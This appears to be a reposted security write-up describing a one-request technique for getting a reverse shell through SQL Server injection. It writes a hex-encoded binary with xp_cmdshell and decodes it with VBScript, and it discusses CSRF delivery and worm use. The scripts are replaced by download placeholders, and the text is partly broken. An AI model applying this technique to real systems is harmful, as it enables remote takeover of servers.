ONE CLICK OWNAGE

ONE CLICK OWNAGE
http://english.mavituna.com

Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.
For example the following text will throw a reverse shell to 192.168.0.1:
1;exec master..xp_cmdshell 'echo
try download link down for complate
Similar attacks have been around for a while, but implementations are either overly complex1 or relies on installed tools2 and lack of outbound filtering in the target system. Advantages of this one request approach are:
1.It's only one request therefore faster,
1 Using debug.exe
2 FTP, TFTP, debug.exe

2.Simple, you don't need a tool you can do it manually by using your browser or a simple MITM proxy, just copy paste the payload,
3. CSRF(able), It's possible to craft a link and carry out a CSRF attack that will give you a reverse shell3,
3. It's not fixed, you can change the payload,
It's short, Generally not more than 3.500 characters, 4
4. Doesn't require any application on the target system like FTP, TFTP or debug.exe5,
5. Easy to automate.

TARGET SYSTEMThis attack only works on SQL Injections in SQL Server and SA (admin priviliges) connections. Obviously the theory can be applied o

IMPLEMENTATIONObvious problem with transferring the initial binary file over HTTP is how to write binary files in an SQL Injection. There are several tricks to accomplish this but none of them are really simple. Since we can't directly carry out and write binary data to the disk we need to convert it to some other format such as base64 and then we need to decode it and write as a binary on the target system. To overcome this problem I used VBScript to encode and decode the binary data. Since VBScript can be found in all Windows systems by default and never seen that it's removed, it's pretty reliable and powerful enough.
1. Generate a hex representation of the "shell.exe" in the local system,
2. Write a VBScript that can process this hex string and generate a valid binary file,
3. Put all this together into one line,
4. Carry out the SQL injection with this one line.

3 If CSRF attack uses GET requests, attack should be shorter than 2083 characters to work in Internet Explorer, all other common browser supports up to 8000 characters. Source: http://www.boutell.com

4 All web servers supports GET requests up to 8000 characters unless they have hardened with a tool for this. POST requests should work all the time. Source: http://www.boutell.com

5 Other than cscript.exe, ships by default in all Windows OS and no one remove it. csript.exe is the tool responsible to execute VBScript and JScript scripts in Windows. Most of the system won't even work without it. Installers and many other applications rely on it actively, so it's a core component of the OS.

CRAFTING THE ATTACKCrafting this attack requires two scripts, first one will encode the binary as hex string, the second one will be transferred to the target system to decode this binary and write it to the file system.
1. Generating Hex Representation of the binary
This is an easy one. UPX the original executable (for example a metasploit reverse shell), read the binary and write it as hex. However even after UPX there is still more space for further optimization. There will be lots of null characters in the output, so this implementation takes advatage of it and implements a simple compression and makes the string shorter.
Output of the BuildText.vbs with a sample meterpreter reverse shell

Writing the BinaryGeneratebinary.vbs writes a new binary to temp folder based on the hex string produced in the first step.
3. Putting it all together
BuildAll.bat batch script will combine the hex string, VBScript then convert them into a one line script. Now all we need to do append the SQL Injection attack, escape it for "echo" usage and URL encode it.

Final attack would be like this:[download link> down]

After this point, to change the shell.exe would be just creating a new hex string with BuildText.vbs.
OTHER IMPLICATION OF THE ATTACK
CSRF

Since it's only one request, this attack can simply combined with CSRF attacks. If there is an SQL Injection in admin interface and if it's vulnerable to CSRF as well an attacker can carry out a successful CSRF attack which will spawn a reverse shell. This wasn't possible before this attack.

WORMS & GOOGLE DRIVEN ATTACKS
In 2008 hundreds of thousands web application hacked due to mass SQL Injection attacks. A similar attack with a bigger effect can be carried out with this one request attack, this behaviour and easy exploitation also makes it a suitable candidate for a worm, which can drop a trojan to all attacked systems and then start searching for new victims via Google or another search engine.
[C1] - BUILDTEXT.VBS
[see doownload link>>down]




One Response to “c0decstuff”

What's on Your Mind...

Thank f' u C0mment